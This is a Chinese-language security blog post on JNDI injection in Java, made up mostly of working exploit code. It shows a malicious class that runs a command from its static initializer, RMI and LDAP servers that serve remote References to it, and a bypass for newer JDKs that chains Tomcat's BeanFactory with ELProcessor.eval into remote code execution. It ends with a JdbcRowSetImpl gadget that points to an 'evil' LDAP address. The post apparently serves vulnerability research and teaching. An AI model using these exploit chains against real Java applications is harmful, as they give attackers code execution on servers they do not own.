JNDI注入

本文最后更新于:1 个月前

rmi

8u121

本地的7000端口开放一个Test.class,其静态代码或者构造方法内写入恶意代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import java.io.IOException;

public class Test {
public Test() {
}

static {
try {
Runtime.getRuntime().exec("calc");
} catch (IOException var1) {
throw new RuntimeException(var1);
}
}
}

JNDIServer,factory参数需要和恶意类名相同:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package com.jndi;

import javax.naming.InitialContext;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class JNDIServer {
public static void main(String[] args) throws Exception {

LocateRegistry.createRegistry(1099);

InitialContext initialContext = new InitialContext();

Reference reference = new Reference("Test", "Test", "http://127.0.0.1:7000/");

initialContext.rebind("rmi://127.0.0.1:1099/reference", reference);
}
}

JNDIClient

1
2
3
4
5
6
7
8
9
10
package com.jndi;

import javax.naming.InitialContext;

public class JNDIClient {
public static void main(String[] args) throws Exception{
InitialContext initialContext = new InitialContext();
initialContext.lookup("rmi://127.0.0.1:1099/reference");
}
}

ldap

8u191

首先开启一个ldap服务器:

然后将引用绑定到ldap服务器上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
package com.jndi;

import javax.naming.InitialContext;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class JNDIServer {
public static void main(String[] args) throws Exception {

InitialContext initialContext = new InitialContext();

Reference reference = new Reference("Test", "Test", "http://127.0.0.1:7000/");

initialContext.rebind("ldap://127.0.0.1:10389/cn=qw,dc=example,dc=com", reference);
}
}

客户端:

1
2
3
4
5
6
7
8
9
10
package com.jndi;

import javax.naming.InitialContext;

public class JNDIClient {
public static void main(String[] args) throws Exception{
InitialContext initialContext = new InitialContext();
initialContext.lookup("ldap://127.0.0.1:10389/cn=qwq,dc=example,dc=com");
}
}

8u191更新了几处地方:

NamingManager下的本地AppClassLoader处引入了无初始化的逻辑

走进下面的loadClass()逻辑,发现加入了trustURLCodebase的逻辑,至此jndi低版本被暂时堵上了

jdk高版本绕过

上面追踪到了漏洞点,在高版本加入了trustURLCodebase判断来限制jndi的远程注入,因此思路就转移到了能否找到一个本地的类,通过引用去查询这个本地factory的时候,会走到getObjectFactoryFromReference()方法,能在本地找到这个类进行类加载就不需要去远程调用了

在拿到factory之后会调用它的getObjectInstance()方法,如果这个factory的getObjectInstance()方法中存在漏洞代码,就可能会导致rce

这里的factory是ObjectFactory类型的

这玩意是一个接口,因此我们需要找到factory需要实现ObjectFactory接口

在tomcat-embed-core包内,存在一个BeanFactory,他的getObjectInstance()方法存在反射调用

向上跟踪bean为ref对象中的classname字段的进行类加载后实例化的对象

method是从forced这张哈希表中获取键名为propName的键值,propName是通过ref来获取所有的addrs的值

在Reference类中,存在一个add()方法,传入参数类型为抽象类RefAddr,

addrs中追加addr

所以说propName理论上也是可控的,因此ra可控,导致value可控

抽象类本身不能被实例化,寻找RefAddr的实现类,若后续传入invoke的参数是字符串类型的

则可以通过add一个StringRefAddr的addr

从ref中获取addrs中键名为forceString的键值对

forceString键值如果是a=b格式的,则会将setterName设置为b,param设置为a并put到forced哈希表中

后续到forced的构建,method的获取都是可控的,

因此可以add一个new StringRefAddr("forceString","a=b")这种格式的

再回到反射调用这里

method是从forced中获取propName的键值,假设我们的恶意ref是a=eval,那么,forced中的method是eval

这里想method为eval,就得向ref中add一个键名为”a”的addr,

这个过程中反射调用的参数valueArray(由value控制)为ra(键名为”a”的键值对)的键值

因此还需要add一个new StringRefAddr("a","参数")这种格式的

因此需要找一个Bean类,存在一个恶意方法,可以传入一个字符串类型的参数

比较熟悉EL表达式漏洞的话就会知道这里可能利用到ELProcessor中的eval方法

需要引入pom

1
2
3
4
5
<dependency>
<groupId>org.glassfish</groupId>
<artifactId>javax.el</artifactId>
<version>3.0.1-b06</version>
</dependency>

当传入

1
2
ELProcessor elProcessor  = new ELProcessor();
elProcessor.eval("Runtime.getRuntime().exec('calc')");

即可执行代码(详细过程这里不展开,有兴趣的可以自己debug一下,实际上就是以点隔开每一部分,从上到下为parent到children,然后parent依次去调用紧邻的child,最上级parent通过类加载获取到对象)

Server:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
package com.jndi;

import org.apache.naming.ResourceRef;
import org.apache.naming.factory.BeanFactory;

import javax.naming.CompositeName;
import javax.naming.InitialContext;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.naming.spi.DirectoryManager;
import javax.naming.spi.ObjectFactory;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.util.Hashtable;

public class JNDIServer {
public static void main(String[] args) throws Exception {

LocateRegistry.createRegistry(1099);

InitialContext initialContext = new InitialContext();

ResourceRef resourceRef = new ResourceRef("javax.el.ELProcessor",null,"","",true,
"org.apache.naming.factory.BeanFactory",null
);

resourceRef.add(new StringRefAddr("forceString","x=eval"));

resourceRef.add(new StringRefAddr("x","Runtime.getRuntime().exec('calc')"));

initialContext.rebind("rmi://127.0.0.1:1099/refObj", resourceRef);
}
}

Client:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
package com.jndi;

import org.omg.PortableInterceptor.ObjectReferenceFactory;

import javax.naming.InitialContext;
import javax.naming.spi.ObjectFactory;

public class JNDIClient {
public static void main(String[] args) throws Exception{


InitialContext initialContext = new InitialContext();
initialContext.lookup("rmi://127.0.0.1:1099/refObj");

}
}

某些情况下可能能够修改trustURLCodebase:

1
2
3
4
5
6
7
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");

Field field = BaseRowSet.class.getDeclaredField("dataSource");
field.setAccessible(true);
JdbcRowSetImpl jdbcRowSet = createObjWithoutConstructor(JdbcRowSetImpl.class);
field.set(jdbcRowSet,"ldap://127.0.0.1:8085/evil");
jdbcRowSet.getDatabaseMetaData();